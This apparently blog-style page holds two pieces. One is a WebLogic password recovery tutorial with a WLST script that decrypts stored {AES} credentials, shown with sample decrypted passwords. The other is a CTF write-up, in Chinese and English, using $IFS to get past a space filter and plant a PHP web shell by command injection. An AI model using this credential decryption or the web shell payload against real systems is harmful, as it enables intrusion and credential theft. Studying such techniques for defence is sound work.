WebLogic 密码恢复

Title : How to recover the Password in WebLogic Server

The below steps need to follow to cover the password in weblogic server.

Step 1:

Run setWlstEnv.sh for setting up the environment variables.

Ex:-

. /u01/Middleware/oracle_common/common/bin/setWlstEnv.sh

Step 2:

weblogic password recover command –

[oracle@localhost bin]$ /opt/installations/tools/jdk1.7.0_55/bin/java weblogic.WLST decryptpassword.py /opt/ntdomain/domains/NT {AES}68+XWFqzaQdP5DmEgmkJZWnRWtIvjBd7v+y6h49tCd0\=

Initializing WebLogic Scripting Tool (WLST) …

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands
========================================
Decrypted Password:p0o9i8u7
========================================

Step 3:

weblogic user recovery command –

[oracle@localhost bin]$ /opt/installations/tools/jdk1.7.0_55/bin/java weblogic.WLST decryptpassword.py /opt/ntdomain/domains/NT {AES}WsnwdqROocsh6D1YOclnc1ySRyzheBNtZD2AGLnjIFM\=

Initializing WebLogic Scripting Tool (WLST) …

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands
========================================
Decrypted Password:weblogic
========================================

 

 

decryptpassword.py:

import os
import weblogic.security.internal.SerializedSystemIni
import weblogic.security.internal.encryption.ClearOrEncryptedService
 
def decryptString(domainPath, encryptedString):
    es = weblogic.security.internal.SerializedSystemIni.getEncryptionService(domainPath)
    ces = weblogic.security.internal.encryption.ClearOrEncryptedService(es)
    decryptedString = ces.decrypt(encryptedString)
    print "=" * 70
    print " " * 10 +"Decrypted Password:" + decryptedString
    print "=" * 70
 
try:
    #os.system('clear')
    if len(sys.argv) == 3:
        decryptString(sys.argv[1], sys.argv[2])
    else:
        print "=" * 70
        print "INVALID ARGUMENTS"
        print "Usage: java weblogic.WLST %s " %sys.argv[0]
        print "example.:"
        print "    java weblogic.WLST %s /oracle/fmwhome/user_projects/domains/NT/ {AES}68+XWFqzaQdP5DmEgmkJZWnRWtIvjBd7v+y6h49tCd0\=" %sys.argv[0]
        print "=" * 70
except:
    print "Unexpected error: ", sys.exc_info()[0]
    dumpStack()
    raise

不使用空格执行Bash命令(绕过空格检测执行Bash命令)

原文链接: http://0xa.li/executing-bash-commands-without-space/
大家好,我在一次CTF比赛中和我的队友@aboul3la发现一种在Web应用挑战中进行命令注入的方法.
如果你输入`>file.txt`服务器就会创建一个file.txt的文件
我们想要写入一个PHP的shell,像这样:
echo "<?PHP CODE>" > file.php
但是问题是,这个比赛的题目过滤空格,不让输入空格(Error: Not valid URL)
所以我们尝试很多种办法绕过,一开始的思路是使用解码的方式来获得一个space(空格),比如从hex或者其他的什么解码成一个空格,但是这种方法在echo后面都不凑效

然后我就进行了搜索,看Linux是否自己已经对空格进行了定义.
最后我发现了,确实是$IFS

解决方法是:
echo\$IFS"<?=system(\$_GET[x]);?>">shell.php
如果你要下载东西,那么wget$IFShttps://google.com/robots.txt

14467750403809

英文原文:
Hello, world.

So I was in this CTF competition and my teammate (@aboul3la) found a command injection vulnerability in one of web application challenges.

If you input >file.txt the server creates a file called file.txt.

We wanted to write a PHP shell to the server (echo “<?PHP CODE>” > file.php)
But the thing is, the challenge had a filter that won’t allow you to have a space in the input (Error: Not valid URL)

So we tried around and my first thought was to use some decoding mechanism to decrypt “space” from it’s hex equivalent or something, but we couldn’t do it without a space after the “echo”
Then i thought i should search and see if the space (or tab) is defined in Linux itself.
And i found it: $IFS.

The solution was:
echo$IFS”<?=system($_GET[x]);?>”>shell.php

If you wanted to wget something: wget$IFS”https://google.com/robots.txt”